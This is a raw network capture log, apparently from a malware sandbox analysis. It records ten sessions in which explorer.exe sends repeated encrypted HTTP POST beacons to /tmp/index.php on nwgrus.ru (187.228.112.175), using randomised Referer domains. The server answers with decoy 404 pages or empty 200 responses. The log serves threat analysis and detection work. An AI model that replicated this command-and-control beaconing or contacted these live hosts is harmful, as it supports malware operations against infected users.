                                                                                                                                                              Sep 30, 2024 15:37:51.359603882 CEST258OUTData Raw: 3b 6e 22 64 8c bb 1c 54 df a9 c9 0b 02 01 08 b8 78 0a c8 94 69 04 e6 67 0d 75 0f e7 47 b0 b5 19 9c 5b c0 2b 76 69 22 6b 9d 9a 3f cb 3a 35 d4 f1 7b d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 29 53 a2 e5
                                                                                                                                                              Data Ascii: ;n"dTxiguG[+vi"k?:5{J7 M@NA .[k,vu)SRqNk{]e0"'^g4{LPCZVo1;EirjahHT3bHzb2'?i taQOFC#pnFB))
                                                                                                                                                              Sep 30, 2024 15:37:52.397855997 CEST152INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.26.0
                                                                                                                                                              Date: Mon, 30 Sep 2024 13:37:52 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Connection: close
                                                                                                                                                              Data Raw: 04 00 00 00 72 e8 86 e4
                                                                                                                                                              Data Ascii: r


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              1192.168.2.849707187.228.112.175804084C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Sep 30, 2024 15:37:52.408180952 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://tkpgpviexggpuwvs.net/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 201
                                                                                                                                                              Host: nwgrus.ru
                                                                                                                                                              Sep 30, 2024 15:37:52.408200026 CEST201OUTData Raw: 3b 6e 22 64 8c bb 1c 54 df a9 c9 0b 02 01 08 b8 78 0a c8 94 69 04 e6 67 0d 75 0f e7 47 b0 b5 19 9c 5b c0 2b 76 69 22 6b 9d 9a 3f cb 3a 35 d4 f1 7b d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0a 6b 2c 90 f5 76 0b 75 2b 0d f0 fb
                                                                                                                                                              Data Ascii: ;n"dTxiguG[+vi"k?:5{J7 M@NA -[k,vu+nZsT1=`z1B25ZYQH2@[a,'DJ-Qkno6
                                                                                                                                                              Sep 30, 2024 15:37:53.547043085 CEST484INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.26.0
                                                                                                                                                              Date: Mon, 30 Sep 2024 13:37:53 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Connection: close
                                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              2192.168.2.849708187.228.112.175804084C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Sep 30, 2024 15:37:53.558628082 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://jrbmtindhjismyee.com/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 291
                                                                                                                                                              Host: nwgrus.ru
                                                                                                                                                              Sep 30, 2024 15:37:53.558648109 CEST291OUTData Raw: 3b 6e 22 64 8c bb 1c 54 df a9 c9 0b 02 01 08 b8 78 0a c8 94 69 04 e6 67 0d 75 0f e7 47 b0 b5 19 9c 5b c0 2b 76 69 22 6b 9d 9a 3f cb 3a 35 d4 f1 7b d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0b 6b 2c 90 f5 76 0b 75 78 24 a2 be
                                                                                                                                                              Data Ascii: ;n"dTxiguG[+vi"k?:5{J7 M@NA -[k,vux$l^WGW~=s;gM[9q_T(;[W"U*ydElp0@AMNX7'2b4NaPG~ct6*f
                                                                                                                                                              Sep 30, 2024 15:37:54.521413088 CEST484INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.26.0
                                                                                                                                                              Date: Mon, 30 Sep 2024 13:37:54 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Connection: close
                                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              3192.168.2.849709187.228.112.175804084C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Sep 30, 2024 15:37:54.581722021 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://ynepfbdxkuieepaf.net/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 260
                                                                                                                                                              Host: nwgrus.ru
                                                                                                                                                              Sep 30, 2024 15:37:54.581734896 CEST260OUTData Raw: 3b 6e 22 64 8c bb 1c 54 df a9 c9 0b 02 01 08 b8 78 0a c8 94 69 04 e6 67 0d 75 0f e7 47 b0 b5 19 9c 5b c0 2b 76 69 22 6b 9d 9a 3f cb 3a 35 d4 f1 7b d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 08 6b 2c 90 f5 76 0b 75 5e 28 ef 95
                                                                                                                                                              Data Ascii: ;n"dTxiguG[+vi"k?:5{J7 M@NA -[k,vu^(hsApmeAu[[4g!A|_08RlK=Gd{34zg[27&s;/X*3/~u@>:T9n|z)O}
                                                                                                                                                              Sep 30, 2024 15:37:55.560359001 CEST137INHTTP/1.1 200 OK
                                                                                                                                                              Server: nginx/1.26.0
                                                                                                                                                              Date: Mon, 30 Sep 2024 13:37:55 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Connection: close


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              4192.168.2.849710187.228.112.175804084C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Sep 30, 2024 15:37:55.584212065 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://xkxmfugtrnxonclj.com/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 175
                                                                                                                                                              Host: nwgrus.ru
                                                                                                                                                              Sep 30, 2024 15:37:55.584223986 CEST175OUTData Raw: 3b 6e 22 64 8c bb 1c 54 df a9 c9 0b 02 01 08 b8 78 0a c8 94 69 04 e6 67 0d 75 0f e7 47 b0 b5 19 9c 5b c0 2b 76 69 22 6b 9d 9a 3f cb 3a 35 d4 f1 7b d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 09 6b 2c 90 f5 76 0b 75 26 3a f3 fa
                                                                                                                                                              Data Ascii: ;n"dTxiguG[+vi"k?:5{J7 M@NA -[k,vu&:nQGcbo& ..] Rkl<GX&XE>/EB3*=.}T_0
                                                                                                                                                              Sep 30, 2024 15:37:56.721446991 CEST484INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.26.0
                                                                                                                                                              Date: Mon, 30 Sep 2024 13:37:56 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Connection: close
                                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              5192.168.2.849711187.228.112.175804084C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Sep 30, 2024 15:37:56.729541063 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://ymeegmcrvikfsv.org/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 323
                                                                                                                                                              Host: nwgrus.ru
                                                                                                                                                              Sep 30, 2024 15:37:56.729566097 CEST323OUTData Raw: 3b 6e 22 64 8c bb 1c 54 df a9 c9 0b 02 01 08 b8 78 0a c8 94 69 04 e6 67 0d 75 0f e7 47 b0 b5 19 9c 5b c0 2b 76 69 22 6b 9d 9a 3f cb 3a 35 d4 f1 7b d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0e 6b 2c 90 f5 76 0b 75 3e 5e bd bc
                                                                                                                                                              Data Ascii: ;n"dTxiguG[+vi"k?:5{J7 M@NA -[k,vu>^ZZsWfP9+3?0xm4|A^-05]M;E+X::BO%@`L{(mZ(GCT;XyWhe67~
                                                                                                                                                              Sep 30, 2024 15:37:57.721139908 CEST137INHTTP/1.1 200 OK
                                                                                                                                                              Server: nginx/1.26.0
                                                                                                                                                              Date: Mon, 30 Sep 2024 13:37:57 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Connection: close


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              6192.168.2.849712187.228.112.175804084C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Sep 30, 2024 15:37:57.894596100 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://qnssdnlxskerq.com/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 339
                                                                                                                                                              Host: nwgrus.ru
                                                                                                                                                              Sep 30, 2024 15:37:57.894619942 CEST339OUTData Raw: 3b 6e 22 64 8c bb 1c 54 df a9 c9 0b 02 01 08 b8 78 0a c8 94 69 04 e6 67 0d 75 0f e7 47 b0 b5 19 9c 5b c0 2b 76 69 22 6b 9d 9a 3f cb 3a 35 d4 f1 7b d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0f 6b 2c 90 f5 76 0b 75 77 50 cd 99
                                                                                                                                                              Data Ascii: ;n"dTxiguG[+vi"k?:5{J7 M@NA -[k,vuwPwWWvv6aK;sJR[ifH&N\@w&NDDOEP-VFPl}Ez\KdoW%oWKs
                                                                                                                                                              Sep 30, 2024 15:37:58.851171017 CEST137INHTTP/1.1 200 OK
                                                                                                                                                              Server: nginx/1.26.0
                                                                                                                                                              Date: Mon, 30 Sep 2024 13:37:58 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Connection: close


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              7192.168.2.849713187.228.112.175804084C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Sep 30, 2024 15:37:58.874209881 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://vpprwqijyswgyjvy.com/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 278
                                                                                                                                                              Host: nwgrus.ru
                                                                                                                                                              Sep 30, 2024 15:37:58.874500036 CEST278OUTData Raw: 3b 6e 22 64 8c bb 1c 54 df a9 c9 0b 02 01 08 b8 78 0a c8 94 69 04 e6 67 0d 75 0f e7 47 b0 b5 19 9c 5b c0 2b 76 69 22 6b 9d 9a 3f cb 3a 35 d4 f1 7b d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0c 6b 2c 90 f5 76 0b 75 70 48 b7 92
                                                                                                                                                              Data Ascii: ;n"dTxiguG[+vi"k?:5{J7 M@NA -[k,vupHc5YFbRdAcx5aAYGBZP?,v 8*yZG!$8 ilTD1ELaE{r%<e
                                                                                                                                                              Sep 30, 2024 15:37:59.877990961 CEST484INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.26.0
                                                                                                                                                              Date: Mon, 30 Sep 2024 13:37:59 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Connection: close
                                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              8192.168.2.849714187.228.112.175804084C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Sep 30, 2024 15:37:59.906555891 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://ayjhmseqvvjye.com/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 165
                                                                                                                                                              Host: nwgrus.ru
                                                                                                                                                              Sep 30, 2024 15:37:59.906584024 CEST165OUTData Raw: 3b 6e 22 64 8c bb 1c 54 df a9 c9 0b 02 01 08 b8 78 0a c8 94 69 04 e6 67 0d 75 0f e7 47 b0 b5 19 9c 5b c0 2b 76 69 22 6b 9d 9a 3f cb 3a 35 d4 f1 7b d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0d 6b 2c 90 f5 76 0b 75 53 35 b4 af
                                                                                                                                                              Data Ascii: ;n"dTxiguG[+vi"k?:5{J7 M@NA -[k,vuS5hA1jG.ov7w69[&wI=/2F4WYoh^Ota(
                                                                                                                                                              Sep 30, 2024 15:38:00.864689112 CEST484INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.26.0
                                                                                                                                                              Date: Mon, 30 Sep 2024 13:38:00 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Connection: close
                                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              9192.168.2.849715187.228.112.175804084C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Sep 30, 2024 15:38:00.890818119 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://bnqsjigsukajkt.org/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 358
                                                                                                                                                              Host: nwgrus.ru
                                                                                                                                                              Sep 30, 2024 15:38:00.890835047 CEST358OUTData Raw: 3b 6e 22 64 8c bb 1c 54 df a9 c9 0b 02 01 08 b8 78 0a c8 94 69 04 e6 67 0d 75 0f e7 47 b0 b5 19 9c 5b c0 2b 76 69 22 6b 9d 9a 3f cb 3a 35 d4 f1 7b d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 02 6b 2c 90 f5 76 0b 75 4d 48 dd ed
                                                                                                                                                              Data Ascii: ;n"dTxiguG[+vi"k?:5{J7 M@NA -[k,vuMH}3XbO`?JZQ6ge@@TX\W?A,$VOxb,"y]2[+vDZ&HO1]dcRbz%@`cuC&!'"&
                                                                                                                                                              Sep 30, 2024 15:38:01.849919081 CEST137INHTTP/1.1 200 OK
                                                                                                                                                              Server: nginx/1.26.0
                                                                                                                                                              Date: Mon, 30 Sep 2024 13:38:01 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Connection: close


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              10192.168.2.849716187.228.112.175804084C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Sep 30, 2024 15:38:01.858439922 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://ejrqbeuhiivimsok.org/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 244
                                                                                                                                                              Host: nwgrus.ru
                                                                                                                                                              Sep 30, 2024 15:38:01.858463049 CEST244OUTData Raw: 3b 6e 22 64 8c bb 1c 54 df a9 c9 0b 02 01 08 b8 78 0a c8 94 69 04 e6 67 0d 75 0f e7 47 b0 b5 19 9c 5b c0 2b 76 69 22 6b 9d 9a 3f cb 3a 35 d4 f1 7b d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 03 6b 2c 90 f5 76 0b 75 2b 2b b3 95
                                                                                                                                                              Data Ascii: ;n"dTxiguG[+vi"k?:5{J7 M@NA -[k,vu++NAsW4qm+HC0IyF%(n]0tf']Yg[3tWQY!t9Oy_%k!i?QTA
                                                                                                                                                              Sep 30, 2024 15:38:03.027226925 CEST484INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.26.0
                                                                                                                                                              Date: Mon, 30 Sep 2024 13:38:02 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Connection: close
                                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
